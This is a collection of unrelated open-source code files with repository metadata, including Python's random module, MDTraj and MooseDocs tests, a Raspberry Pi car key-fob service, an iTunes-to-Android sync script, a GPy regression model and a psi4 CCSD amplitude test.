1.0).""" return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF def getrandbits(self, k): """getrandbits(k) -> x. Generates a long int with k random bits.""" if k <= 0: raise ValueError('number of bits must be greater than zero') if k != int(k): raise TypeError('number of bits should be an integer') bytes = (k + 7) // 8 # bits / 8 and rounded up x = long(_hexlify(_urandom(bytes)), 16) return x >> (bytes * 8 - k) # trim excess bits def _stub(self, *args, **kwds): "Stub method. Not used for a system random number generator." return None seed = jumpahead = _stub def _notimplemented(self, *args, **kwds): "Method should not be called for a system random number generator." 
raise NotImplementedError('System entropy source does not have state.') getstate = setstate = _notimplemented ## -------------------- test program -------------------- def _test_generator(n, func, args): import time print n, 'times', func.__name__ total = 0.0 sqsum = 0.0 smallest = 1e10 largest = -1e10 t0 = time.time() for i in range(n): x = func(*args) total += x sqsum = sqsum + x*x smallest = min(x, smallest) largest = max(x, largest) t1 = time.time() print round(t1-t0, 3), 'sec,', avg = total/n stddev = _sqrt(sqsum/n - avg*avg) print 'avg %g, stddev %g, min %g, max %g' % \ (avg, stddev, smallest, largest) def _test(N=2000): _test_generator(N, random, ()) _test_generator(N, normalvariate, (0.0, 1.0)) _test_generator(N, lognormvariate, (0.0, 1.0)) _test_generator(N, vonmisesvariate, (0.0, 1.0)) _test_generator(N, gammavariate, (0.01, 1.0)) _test_generator(N, gammavariate, (0.1, 1.0)) _test_generator(N, gammavariate, (0.1, 2.0)) _test_generator(N, gammavariate, (0.5, 1.0)) _test_generator(N, gammavariate, (0.9, 1.0)) _test_generator(N, gammavariate, (1.0, 1.0)) _test_generator(N, gammavariate, (2.0, 1.0)) _test_generator(N, gammavariate, (20.0, 1.0)) _test_generator(N, gammavariate, (200.0, 1.0)) _test_generator(N, gauss, (0.0, 1.0)) _test_generator(N, betavariate, (3.0, 3.0)) _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0)) # Create one instance, seeded from current time, and export its methods # as module-level functions. The functions share state across all uses #(both in the user's code and in the Python libraries), but that's fine # for most programs and is easier for the casual user than making them # instantiate their own Random() instance. _inst = Random() seed = _inst.seed random = _inst.random uniform = _inst.uniform triangular = _inst.triangular randint = _inst.randint choice = _inst.choice randrange = _inst.randrange sample = _inst.sample shuffle = _inst.shuffle normalvariate = _inst.normalvariate lognormvariate = _inst.lognormvariate expovariate = _inst.expovariate vonmisesvariate = _inst.vonmisesvariate gammavariate = _inst.gammavariate gauss = _inst.gauss betavariate = _inst.betavariate paretovariate = _inst.paretovariate weibullvariate = _inst.weibullvariate getstate = _inst.getstate setstate = _inst.setstate jumpahead = _inst.jumpahead getrandbits = _inst.getrandbits if __name__ == '__main__': _test()
HiSPARC/station-software
user/python/Lib/random.py
Python
gpl-3.0
32,457
[ "Gaussian" ]
789798fe4bdca163ecbabb49f79ba82aa0aa0c83c05a6b84b3cf86c35b3abc92
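The jumpahead() docstrings in the row above recommend cloning state and jumping to give threads disjoint streams. A minimal sketch of that pattern, runnable on the Python 2 interpreter this module targets; with the Mersenne Twister the jump lands on some distant state rather than exactly n steps ahead, as the module docstring notes.

import random

r1 = random.Random(42)
r2 = random.Random()
r2.setstate(r1.getstate())  # r2 now mirrors r1 exactly
r2.jumpahead(10 ** 6)       # move r2 far away from r1's stream

print(r1.random())
print(r2.random())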
############################################################################## # MDTraj: A Python Library for Loading, Saving, and Manipulating # Molecular Dynamics Trajectories. # Copyright 2012-2013 Stanford University and the Authors # # Authors: Robert McGibbon # Contributors: # # MDTraj is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as # published by the Free Software Foundation, either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with MDTraj. If not, see <http://www.gnu.org/licenses/>. ############################################################################## """ Code to test the mdconvert script. These tests take about two minutes to run. This checks all pairs of formats, converting from format x -> format y. It also tries using striding to subsample the trajectory and atom_indices, so it does significant integration testing of the XXXTrajectoryFile modules as well. """ import os import sys import numpy as np import mdtraj as md from mdtraj import element from mdtraj.testing import eq import pytest import subprocess on_win = (sys.platform == 'win32') on_py3 = (sys.version_info >= (3, 0)) @pytest.fixture() def traj(tmpdir): xyz = np.around(np.random.randn(10, 5, 3).astype(np.float32), 2) topology = md.Topology() chain = topology.add_chain() residue = topology.add_residue('ALA', chain) topology.add_atom('CA', element.carbon, residue) topology.add_atom('HG1', element.hydrogen, residue) topology.add_atom('SG', element.sulfur, residue) topology.add_atom('OD1', element.oxygen, residue) topology.add_atom('NE', element.nitrogen, residue) time = np.arange(10) ** 2 unitcell_lengths = np.array([[1.1, 1.2, 1.3]] * 10) unitcell_angles = np.array([[90, 90, 95]] * 10) traj = md.Trajectory(xyz, topology=topology, time=time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) fn = '{}/ref.h5'.format(tmpdir) traj.save(fn) return traj, fn, str(tmpdir) def test_index(traj): # Check that extracting a specific index works traj, in_fn, tmpdir = traj out_fn = '{}/frame4.pdb'.format(tmpdir) subprocess.check_call(['mdconvert', in_fn, '-i', '4', '-o', out_fn]) frame4 = md.load(out_fn) eq(frame4.xyz, traj[4].xyz) def test_slice(traj): # Check that extracting a specific slice works traj, in_fn, tmpdir = traj out_fn = '{}/frame13.pdb'.format(tmpdir) subprocess.check_call(['mdconvert', in_fn, '-i', '1:5:2', '-o', out_fn]) frame13 = md.load(out_fn) eq(frame13.xyz, traj[1:5:2].xyz) extensions = [ 'xtc', 'dcd', 'binpos', 'trr', 'nc', 'pdb', 'h5', 'lh5', 'netcdf' ] @pytest.fixture(params=extensions, ids=lambda x: 'from-' + x) def extension(request): if on_win and on_py3 and request.param == 'lh5': pytest.skip('No lh5 on windows py3') return request.param def test_pairwise(traj, extension): """ensure that the xyz coordinates are preserved by a trip from python -> save in format X -> mdconvert to format Y -> python """ traj, _, tmpdir = traj ext1 = extension # save one copy of traj for use as a topology file topology_fn = "{}/topology.pdb".format(tmpdir) traj[0].save(topology_fn) # save a .dat file for the atom_indices so that we can test # mdconvert's atom_indices flag 
atom_indices = np.array([0, 3]) atom_indices_fn = "{}/atom_indices.dat".format(tmpdir) np.savetxt(atom_indices_fn, atom_indices, fmt='%d') in_fn = "{}/traj.{}".format(tmpdir, ext1) traj.save(in_fn) working_dir = '{}/from-{}'.format(tmpdir, ext1) os.mkdir(working_dir) for ext2 in extensions: print(ext2) out_fn = 'traj.{}'.format(ext2) command1 = ['mdconvert', in_fn, '-o', out_fn, '-c 6'] if ext2 in ['pdb', 'h5', 'lh5']: # if we're saving a pdb or h5, we need to give it a topology too command1 += ['-t', topology_fn] # TODO: test fixture subprocess.check_call(command1, cwd=working_dir) # Use the --atom_indices flag to mdconvert command2 = command1 + ['-a', atom_indices_fn] command2[3] = 'subset.' + out_fn # make sure the output goes to a different file subprocess.check_call(command2, cwd=working_dir) # Use the --stride 3 flag command3 = command1 + ['-s 3'] command3[3] = 'stride.' + out_fn # change the out filename, so they don't get clobbered subprocess.check_call(command3, cwd=working_dir) # ensure that the xyz coordinates are preserved by a trip # from python -> save in format X -> mdconvert to format Y -> python load_kwargs_check1 = {} load_kwargs_check2 = {} if ext2 not in ['pdb', 'h5', 'lh5']: load_kwargs_check1['top'] = traj.topology load_kwargs_check2['top'] = traj.topology.subset(atom_indices) out1 = md.load(os.path.join(working_dir, out_fn), **load_kwargs_check1) out2 = md.load(os.path.join(working_dir, 'subset.' + out_fn), **load_kwargs_check2) out3 = md.load(os.path.join(working_dir, 'stride.' + out_fn), **load_kwargs_check1) if ext1 in ['lh5'] or ext2 in ['lh5']: decimal = 3 else: decimal = 6 eq(out1.xyz, traj.xyz, decimal=decimal) eq(out2.xyz, traj.xyz[:, atom_indices], decimal=decimal) eq(out3.xyz, traj.xyz[::3], decimal=decimal) if ext1 not in ['binpos', 'lh5'] and ext2 not in ['binpos', 'lh5']: # binpos doesn't save unitcell information eq(out1.unitcell_vectors, traj.unitcell_vectors, decimal=2) eq(out2.unitcell_vectors, traj.unitcell_vectors, decimal=2) eq(out3.unitcell_vectors, traj.unitcell_vectors[::3], decimal=2) if all(e in ['xtc', 'trr', 'nc', 'h5'] for e in [ext1, ext2]): # these formats contain time information eq(out1.time, traj.time) eq(out2.time, traj.time) eq(out3.time, traj.time[::3]) if ext2 in ['pdb', 'h5', 'lh5']: # these formats contain a topology in the file that was # read from disk eq(out1.topology, traj.topology) eq(out2.topology, traj.topology.subset(atom_indices)) eq(out3.topology, traj.topology) def test_mdconvert_alanine(tmpdir, get_fn): command = ['mdconvert', get_fn('alanine-dipeptide-explicit.binpos'), '--top', get_fn('alanine-dipeptide-explicit.prmtop'), '-o', 'out.dcd'] subprocess.check_call(command, cwd=str(tmpdir)) t = md.load('{}/out.dcd'.format(tmpdir), top=get_fn('alanine-dipeptide-explicit.prmtop')) t2 = md.load(get_fn('alanine-dipeptide-explicit.binpos'), top=get_fn('alanine-dipeptide-explicit.prmtop')) eq(t.xyz, t2.xyz)
dwhswenson/mdtraj
tests/test_mdconvert.py
Python
lgpl-2.1
7,326
[ "MDTraj", "NetCDF" ]
c45db8aaffaaf35af89d9b1ed70189f37a97531831225946efee3829c587d658
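test_pairwise in the row above asserts that coordinates survive a save -> mdconvert -> load round trip. A hedged sketch of the same invariant using only the public mdtraj API; 'input.pdb' and 'roundtrip.xtc' are placeholder file names, and the 1e-3 tolerance reflects xtc's reduced-precision coordinate storage.

import numpy as np
import mdtraj as md

traj = md.load('input.pdb')                         # placeholder input
traj.save('roundtrip.xtc')                          # format chosen by extension
back = md.load('roundtrip.xtc', top=traj.topology)  # xtc carries no topology
assert np.allclose(traj.xyz, back.xyz, atol=1e-3)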
#!/usr/bin/python # # Copyright (C) 2015, Jaguar Land Rover # # This program is licensed under the terms and conditions of the # Mozilla Public License, version 2.0. The full text of the # Mozilla Public License is at https://www.mozilla.org/MPL/2.0/ # # # Register a service specified by command line with an RVI node. # Print out a message when the service gets invoked. # import sys from rvilib import RVI import getopt import time import RPi.GPIO as GPIO from subprocess import call GPIO_UNLOCK = 5 GPIO_LOCK = 6 GPIO_LIGHTS = 13 GPIO_TRUNK = 19 GPIO_PANIC = 26 def usage(): print "Usage:", sys.argv[0], "[-n <rvi_url>]" print " <rvi_url> URL of Service Edge on a local RVI node." print " Default: http://localhost:8811" print print "The RVI Service Edge URL can be found in" print "[backend,vehicle].config as" print "env -> rvi -> components -> service_edge -> url" print print "The Service Edge URL is also logged as a notice when the" print "RVI node is started." print print "Example: ./fob.py -n http://rvi1.nginfotpdx.net:8801" sys.exit(255) # # Our general handler, registered with rvi.register_service() below. # # You can also explicitly name the arguments, but then # the sender has to match the argument names. # For example: # rvi_call.py http://localhost:8801 jlr.com/bt/test a=1 b=2 c=3 -> # def service(a,b,c) # def unlock_invoked(**args): GPIO.output(GPIO_UNLOCK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_UNLOCK, GPIO.LOW) return ['ok'] def lock_invoked(**args): GPIO.output(GPIO_LOCK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_LOCK, GPIO.LOW) return ['ok'] def lights_invoked(**args): GPIO.output(GPIO_LIGHTS, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_LIGHTS, GPIO.LOW) return ['ok'] def trunk_invoked(**args): GPIO.output(GPIO_TRUNK, GPIO.HIGH) time.sleep( 0.3 ) GPIO.output(GPIO_TRUNK, GPIO.LOW) return ['ok'] def start_invoked(**args): print "Start not supported" return ['ok'] def stop_invoked(**args): print "Stop not supported" return ['ok'] def horn_invoked(**args): print "Horn not supported" return ['ok'] def panic_invoked(**args): GPIO.output(GPIO_PANIC, GPIO.HIGH) time.sleep( 0.3 ) # Longer? GPIO.output(GPIO_PANIC, GPIO.LOW) return ['ok'] def services_available(**args): print print "Services available!" print "args:", args print return ['ok'] def services_unavailable(**args): print "Services unavailable!" # Lock the door when BT connection goes away lock_invoked() return ['ok'] # # Check that we have the correct arguments # opts, args= getopt.getopt(sys.argv[1:], "n:") rvi_node_url = "http://localhost:8801" for o, a in opts: if o == "-n": rvi_node_url = a else: usage() if len(args) != 0: usage() # Setup GPIO pins GPIO.setmode(GPIO.BCM) GPIO.setup(GPIO_UNLOCK, GPIO.OUT) # unlock GPIO.setup(GPIO_LOCK, GPIO.OUT) # lock GPIO.setup(GPIO_LIGHTS, GPIO.OUT) # lights GPIO.setup(GPIO_TRUNK, GPIO.OUT) # trunk (weird) GPIO.setup(GPIO_PANIC, GPIO.OUT) # panic # # Setup initial state # GPIO.output(GPIO_UNLOCK, GPIO.LOW) GPIO.output(GPIO_LOCK, GPIO.LOW) GPIO.output(GPIO_LIGHTS, GPIO.LOW) GPIO.output(GPIO_TRUNK, GPIO.LOW) GPIO.output(GPIO_PANIC, GPIO.LOW) # Setup a connection to the local RVI node rvi = RVI(rvi_node_url) # Starting the thread that handles incoming calls is # not really necessary since register_service will do it for us. 
rvi.start_serve_thread() rvi.set_services_available_callback(services_available) rvi.set_services_unavailable_callback(services_unavailable) # Register our services and invoke the matching handler when we # get an incoming JSON-RPC call to one of them from the RVI node # rvi.register_service("unlock", unlock_invoked) rvi.register_service("lock", lock_invoked) #rvi.register_service("start", start_invoked) #rvi.register_service("stop", stop_invoked) #rvi.register_service("horn", horn_invoked) rvi.register_service("trunk", trunk_invoked) rvi.register_service("panic", panic_invoked) rvi.register_service("lights", lights_invoked) while True: time.sleep(36000) sys.exit(0)
arod155/rvi-front-end
python/fob.py
Python
mpl-2.0
4,294
[ "Jaguar" ]
c523b68d0bc2e169b0671108ca2e9097a4e4b348a0347adba56d292dd3aa4917
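Every handler in the row above repeats the same three lines: drive a pin HIGH, sleep 0.3 s, drive it LOW. A small helper, sketched here with the same RPi.GPIO calls and the pin constants defined in that script, removes the duplication:

import time
import RPi.GPIO as GPIO

def pulse(pin, duration=0.3):
    # Hold `pin` HIGH for `duration` seconds, then release it.
    GPIO.output(pin, GPIO.HIGH)
    time.sleep(duration)
    GPIO.output(pin, GPIO.LOW)

def unlock_invoked(**args):
    pulse(GPIO_UNLOCK)  # GPIO_UNLOCK = 5, as defined in the script above
    return ['ok']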
import shell import prints import collections import os import re import time ### BEGIN CONFIGURATION OPTIONS ### # location of your itunes library # (or whatever directory you want to recursively transfer) ITUNES_LIBRARY = "/Users/chris/Music/iTunes/iTunes Media/Music/" GALAXY_LIBRARY = "/sdcard/Music/" # use "adb -d shell ls /" to find this # location of adb # mine was originally at: # ~/Downloads/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb # I created a symlink for convenience, but this is not necessary. ADB = "/usr/local/bin/adb" # It often takes more than 1 try to connect to the device # the device is `offline` at first but wakes up after the # first attempt. 5 is a liberal number - 2 tries typically works. CONNECTION_TRIES = 5 DBG_REPORT = True # Whether to print a summary of the sync DBG_ERROR = True # Whether to print errors DBG_WARN = True # Whether to print warnings DBG_VERB = True # Whether to print a summary of every transaction ### END CONFIGURATION OPTIONS ### SHELL_ALIASES = {'adb': ADB, 'galaxy': '%s -d' % ADB, # Alias for sending commands to phone 'restart': '%s %s ; %s %s' % (ADB, 'kill-server', ADB, 'start-server')} DEVICE_STATES = collections.defaultdict(bool) DEVICE_STATES.update({ "offline": False, "device": True, "unauthorized": False, "no device": False, }) # Parses the serial numbers and states returned by "adb devices" DEVICE_REPORT_PATTERN = "\n([0-9\-a-zA-Z]+)\t(%s)" % ( '|'.join(DEVICE_STATES.keys())) # Shell interface - see shell.py. Global here but initialized in setup() SH = None def report(s): if DBG_REPORT: prints.stdout(s+'\n') def warn(s): if DBG_WARN: prints.stdout(s+'\n') def error(s): if DBG_ERROR: prints.stderr(s+'\n') def log(s): if DBG_VERB: prints.stdout(s+'\n') def i_to_g(s): """ Convert iTunes path to Galaxy filesystem location. Technically this could fail if you had some weird artist/album/song names, but if it did it would at least fail consistently. """ return s.replace(ITUNES_LIBRARY, GALAXY_LIBRARY) def g_to_i(s): return s.replace(GALAXY_LIBRARY, ITUNES_LIBRARY) def num_attached_devices(): """ Issue 'adb devices' command to find the number of connected devices """ res = SH.cmd('adb devices') devices = re.findall(DEVICE_REPORT_PATTERN, res) log = '\n'.join('Device #[%s] state: %s' %(serial,state) for serial, state in devices) status = None if len(devices) != 1 else DEVICE_STATES[devices[0][1]] return len(devices), log, status def check_num_devices(): """ Try to get a listing of devices, and return True if there's exactly 1. """ num_devices, log, status = num_attached_devices() tries = CONNECTION_TRIES while num_devices <= 0: if tries > 0: warn('Could not find your android device. Trying again...') elif tries == 0: report('Could not find your android device. Aborting') return False tries -= 1 time.sleep(2) SH.cmd('restart') time.sleep(2) # Give daemon some time to boot up num_devices, log, status = num_attached_devices() if num_devices > 1: error('Too many connected android devices - aborting.') error(log) return False return True def check_device_state(): num_devices, log, status = num_attached_devices() tries = CONNECTION_TRIES while not status: if tries > 0: warn('Device not online. Trying again.') elif tries == 0: error('Device is not online. 
Aborting.') return False tries -= 1 time.sleep(2) SH.cmd('restart') time.sleep(2) num_devices, log, status = num_attached_devices() return True def check_exists(string, flag): path = shell.escape(string) cmd = "if [ %s %s ]; then echo 'Exists'; else echo 'Not found'; fi" % ( flag, path) command = 'galaxy shell "%s"' % cmd aliased = SH.apply_aliases(command) res = SH.cmd(command) if 'Exists' in res: return True elif 'Not found' in res: return False else: error("Invalid result from command %s" % aliased) error(res) def g_has_dir(dirname): return check_exists(dirname, '-d') def g_has_file(filename): return check_exists(filename, '-f') def g_create_dir(dirname): res = SH.cmd('galaxy shell mkdir %s' % shell.escape(dirname)) if not g_has_dir(dirname): error("Failed to create directory: %s" % dirname) error(SH.apply_aliases('galaxy shell mkdir %s' % shell.escape(dirname))) error(res) else: log("Successfully created directory: %s" % dirname) def push_to(i_fname, g_dirname, g_filename): i_fname = shell.escape(i_fname) g_dirname = shell.escape(g_dirname) res = SH.cmd('galaxy push %(i_fname)s %(g_dirname)s' % locals()) if not g_has_file(g_filename): error("Failed to push file: %s" % g_filename) error(SH.apply_aliases('galaxy push %(i_fname)s %(g_dirname)s' % locals())) error(res) else: log("Successfully pushed %s to %s.\n" % (i_fname, g_dirname)) def setup(): if not os.path.exists(ITUNES_LIBRARY): error('Could not find iTunes library: %s' % ITUNES_LIBRARY) return False if not os.path.exists(ADB): error('Could not find adb - maybe the location of your Android SDK changed?') error('adb = %s' % ADB) return False global SH ; SH = shell.Shell(aliases=SHELL_ALIASES) SH.cmd('restart') return check_num_devices() and check_device_state() def sync_music(): if not setup(): exit(1) moved = 0 for root, dirs, files in os.walk(ITUNES_LIBRARY): groot = i_to_g(root) if not g_has_dir(groot): g_create_dir(groot) for i_filename in (os.path.join(root, fbase) for fbase in files): if os.path.basename(i_filename).startswith('.'): continue g_filename = i_to_g(i_filename) if not g_has_file(g_filename): push_to(i_filename, groot, g_filename) moved += 1 else: log("[%s] already on device" % g_filename) if moved > 0: report('Transferred %d music files from iTunes to Galaxy.' % moved) if __name__ == '__main__': sync_music()
bluquar/itunes_android_nofluff
sync_music.py
Python
mit
6,489
[ "Galaxy" ]
a54227c5a918869355d232543af0e3c67d0318b0c78af24b7ffd708c112b77dc
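The i_to_g()/g_to_i() helpers in the row above map paths with str.replace(), which the docstring itself admits can misfire on unusual names. A stricter mapping is a short function built on os.path.relpath; this sketch reuses the script's ITUNES_LIBRARY and GALAXY_LIBRARY constants and is an alternative, not the script's own code.

import os

def i_to_g_strict(path):
    # Map an iTunes path into the Galaxy music tree, or fail loudly.
    rel = os.path.relpath(path, ITUNES_LIBRARY)
    if rel.startswith(os.pardir):
        raise ValueError('%s is outside the iTunes library' % path)
    return GALAXY_LIBRARY + rel  # GALAXY_LIBRARY already ends with '/'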
#!/usr/bin/env python3 #* This file is part of the MOOSE framework #* https://www.mooseframework.org #* #* All rights reserved, see COPYRIGHT for full restrictions #* https://github.com/idaholab/moose/blob/master/COPYRIGHT #* #* Licensed under LGPL 2.1, please see LICENSE for details #* https://www.gnu.org/licenses/lgpl-2.1.html import unittest import os import multiprocessing from MooseDocs import ROOT_DIR from MooseDocs.tree import pages class TestPage(unittest.TestCase): """ Tests for the pages tree structure. """ def testPage(self): one = pages.Page('one', source='foo') self.assertEqual(one.name, 'one') self.assertEqual(one.source, 'foo') def testDirectory(self): node = pages.Directory('name', source='foo') self.assertEqual(node.source, 'foo') self.assertEqual(node.COLOR, 'CYAN') def testFile(self): source = os.path.join(ROOT_DIR, 'docs', 'content', 'utilities', 'MooseDocs', 'index.md') node = pages.File('foo', source=source) self.assertEqual(node.source, source) if __name__ == '__main__': unittest.main(verbosity=2)
nuclear-wizard/moose
python/MooseDocs/test/tree/test_page.py
Python
lgpl-2.1
1,142
[ "MOOSE" ]
56b9a8385d96477d8a9fcb4207441f93f1e251731ee6cb8a3d3a945b4d3afa88
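The tests in the row above exercise pages.Page one node at a time. A hedged sketch of building such nodes in bulk, one per markdown file; the walk root is a placeholder and only the Page(name, source=...) constructor shown in the tests is assumed.

import os
from MooseDocs.tree import pages

nodes = []
for root, _, files in os.walk('docs/content'):  # placeholder root
    for fname in files:
        if fname.endswith('.md'):
            nodes.append(pages.Page(fname, source=os.path.join(root, fname)))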
# Copyright (c) 2012 - 2014 the GPy Authors (see AUTHORS.txt) # Licensed under the BSD 3-clause license (see LICENSE.txt) import numpy as np from ..core import GP from .. import likelihoods from .. import kern from .. import util class GPCoregionalizedRegression(GP): """ Gaussian Process model for heteroscedastic multioutput regression This is a thin wrapper around the models.GP class, with a set of sensible defaults :param X_list: list of input observations corresponding to each output :type X_list: list of numpy arrays :param Y_list: list of observed values related to the different noise models :type Y_list: list of numpy arrays :param kernel: a GPy kernel, defaults to RBF ** Coregionalized :type kernel: None | GPy.kernel :param likelihoods_list: a list of likelihoods, defaults to a list of Gaussian likelihoods :type likelihoods_list: None | a list of GPy.likelihoods :param name: model name :type name: string :param W_rank: rank of the coregionalization parameter matrix 'W' (see coregionalize kernel documentation) :type W_rank: integer :param kernel_name: name of the kernel :type kernel_name: string """ def __init__(self, X_list, Y_list, kernel=None, likelihoods_list=None, name='GPCR',W_rank=1,kernel_name='coreg'): #Input and Output X,Y,self.output_index = util.multioutput.build_XY(X_list,Y_list) Ny = len(Y_list) #Kernel if kernel is None: kernel = kern.RBF(X.shape[1]-1) kernel = util.multioutput.ICM(input_dim=X.shape[1]-1, num_outputs=Ny, kernel=kernel, W_rank=W_rank,name=kernel_name) #Likelihood likelihood = util.multioutput.build_likelihood(Y_list,self.output_index,likelihoods_list) super(GPCoregionalizedRegression, self).__init__(X,Y,kernel,likelihood, Y_metadata={'output_index':self.output_index})
avehtari/GPy
GPy/models/gp_coregionalized_regression.py
Python
bsd-3-clause
1,917
[ "Gaussian" ]
94f44f0fcb4c8e7d075f6316f6130a2f6305de1fa310a38c4b1b156932e5380e
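A usage sketch for the wrapper in the row above: two outputs observed at different inputs, fitted jointly. The data are synthetic; only the constructor signature defined in that file and GPy's documented GPy.models entry point are assumed, and the default RBF ** Coregionalized kernel is used.

import numpy as np
import GPy

X1 = np.random.rand(20, 1)
X2 = np.random.rand(15, 1)
Y1 = np.sin(6 * X1) + 0.05 * np.random.randn(20, 1)
Y2 = np.sin(6 * X2 + 0.3) + 0.05 * np.random.randn(15, 1)

m = GPy.models.GPCoregionalizedRegression([X1, X2], [Y1, Y2])
m.optimize()  # maximum-likelihood fit of kernel and noise parameters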
#! API access to CCSD amplitudes import numpy as np import psi4 Ne = psi4.geometry(""" 0 1 Ne 0.0 0.0 0.0 symmetry c1 """) psi4.set_options({'basis': 'cc-pvdz', 'freeze_core': 'false'}) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=Ne) amps = wfn.get_amplitudes() TIjAb = amps['tIjAb'].to_array() TIA = amps['tIA'].to_array() tau_IjAb = TIjAb + np.einsum("ia,jb->ijab", TIA, TIA) mints = psi4.core.MintsHelper(wfn.basisset()) D = mints.mo_eri( wfn.Ca_subset("AO", "OCC"), wfn.Ca_subset("AO", "VIR"), wfn.Ca_subset("AO", "OCC"), wfn.Ca_subset("AO", "VIR")).to_array() D = D.swapaxes(1, 2) RHF_ccsd_corr_e = 2 * np.einsum("ijab,ijab->", tau_IjAb, D) - np.einsum("ijab,ijba->", tau_IjAb, D) psi4.compare_values(RHF_ccsd_corr_e, psi4.variable('CCSD CORRELATION ENERGY'), 8, "RHF CCSD CORRELATION ENERGY") # END RHF psi4.core.clean() # UHF psi4.set_options({ 'basis': 'cc-pvdz', 'freeze_core': 'false', 'reference': 'UHF', }) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=Ne) amps = wfn.get_amplitudes() TIJAB = amps['tIJAB'].to_array() Tijab = amps['tijab'].to_array() TIjAb = amps['tIjAb'].to_array() Tia = amps['tia'].to_array() TIA = amps['tIA'].to_array() tauIJAB = TIJAB + np.einsum('IA,JB->IJAB', TIA, TIA) - np.einsum("IA,JB->IJBA", TIA, TIA) tauijab = Tijab + np.einsum('ia,jb->ijab', Tia, Tia) - np.einsum("ia,jb->ijba", Tia, Tia) tauIjAb = TIjAb + np.einsum('IA,jb->IjAb', TIA, Tia) CO = wfn.Ca_subset("AO", "OCC") Co = wfn.Cb_subset("AO", "OCC") CV = wfn.Ca_subset("AO", "VIR") Cv = wfn.Cb_subset("AO", "VIR") mints = psi4.core.MintsHelper(wfn.basisset()) D_IJAB = mints.mo_eri(CO, CV, CO, CV).to_array().swapaxes(1, 2) D_ijab = mints.mo_eri(Co, Cv, Co, Cv).to_array().swapaxes(1, 2) D_IjAb = mints.mo_eri(CO, CV, Co, Cv).to_array().swapaxes(1, 2) E2AA = 0.5 * np.einsum("IJAB,IJAB->", tauIJAB, D_IJAB) E2BB = 0.5 * np.einsum("ijab,ijab->", tauijab, D_ijab) E2AB = np.einsum("IjAb,IjAb->", tauIjAb, D_IjAb) UHF_ccsd_corr_e = E2AA + E2BB + E2AB psi4.compare_values(UHF_ccsd_corr_e, psi4.variable("CCSD CORRELATION ENERGY"), 8, "UHF CCSD CORRELATION ENERGY") # END UHF psi4.core.clean() # ROHF-semicanonical CN = psi4.geometry(""" units bohr 0 2 C 0.000000000000 0.000000000000 1.195736583480 N 0.000000000000 0.000000000000 -1.024692078304 symmetry c1 """) psi4.set_options({ 'basis': 'cc-pvdz', 'freeze_core': 'false', 'reference': 'ROHF', 'semicanonical': 'True', }) _, wfn = psi4.energy('ccsd', return_wfn=True, molecule=CN) amps = wfn.get_amplitudes() TIJAB = amps['tIJAB'].to_array() Tijab = amps['tijab'].to_array() TIjAb = amps['tIjAb'].to_array() Tia = amps['tia'].to_array() TIA = amps['tIA'].to_array() tauIJAB = TIJAB + np.einsum('IA,JB->IJAB', TIA, TIA) - np.einsum("IA,JB->IJBA", TIA, TIA) tauijab = Tijab + np.einsum('ia,jb->ijab', Tia, Tia) - np.einsum("ia,jb->ijba", Tia, Tia) tauIjAb = TIjAb + np.einsum('IA,jb->IjAb', TIA, Tia) CO = wfn.Ca_subset("AO", "OCC") Co = wfn.Cb_subset("AO", "OCC") CV = wfn.Ca_subset("AO", "VIR") Cv = wfn.Cb_subset("AO", "VIR") fIA = psi4.core.Matrix.triplet(CO, wfn.Fa(), CV, True, False, False).to_array() fia = psi4.core.Matrix.triplet(Co, wfn.Fb(), Cv, True, False, False).to_array() mints = psi4.core.MintsHelper(wfn.basisset()) D_IJAB = mints.mo_eri(CO, CV, CO, CV).to_array().swapaxes(1, 2) D_ijab = mints.mo_eri(Co, Cv, Co, Cv).to_array().swapaxes(1, 2) D_IjAb = mints.mo_eri(CO, CV, Co, Cv).to_array().swapaxes(1, 2) E1_A = np.einsum("IA,IA->", TIA, fIA) E1_B = np.einsum("ia,ia->", Tia, fia) E2AA = 0.5 * np.einsum("IJAB,IJAB->", tauIJAB, D_IJAB) E2BB = 0.5 * 
np.einsum("ijab,ijab->", tauijab, D_ijab) E2AB = np.einsum("IjAb,IjAb->", tauIjAb, D_IjAb) ROHF_ccsd_corr_e = E2AA + E2BB + E2AB + E1_A + E1_B psi4.compare_values(ROHF_ccsd_corr_e, psi4.variable("CCSD CORRELATION ENERGY"), 8, "ROHF CCSD CORRELATION ENERGY") # END ROHF
CDSherrill/psi4
samples/python/cc_amps/test.py
Python
lgpl-3.0
3,907
[ "Psi4" ]
9eed00e131ba098285281c10702ac9dc98df1b866f047f48b04738c7d0a0d254
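The RHF, UHF, and ROHF blocks in the row above all evaluate the same kind of tau/integral contraction. Below is a NumPy-only restatement of the closed-shell case, with t2 shaped (occ, occ, vir, vir), t1 shaped (occ, vir), and D the (ov|ov) integrals reordered to physicist convention as in the script.

import numpy as np

def rhf_ccsd_corr(t2, t1, D):
    # Closed-shell CCSD correlation energy from tau = t2 + t1*t1:
    # E_corr = 2 * sum(tau * D) - sum(tau * D with b,a swapped in D).
    tau = t2 + np.einsum('ia,jb->ijab', t1, t1)
    return (2 * np.einsum('ijab,ijab->', tau, D)
            - np.einsum('ijab,ijba->', tau, D))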
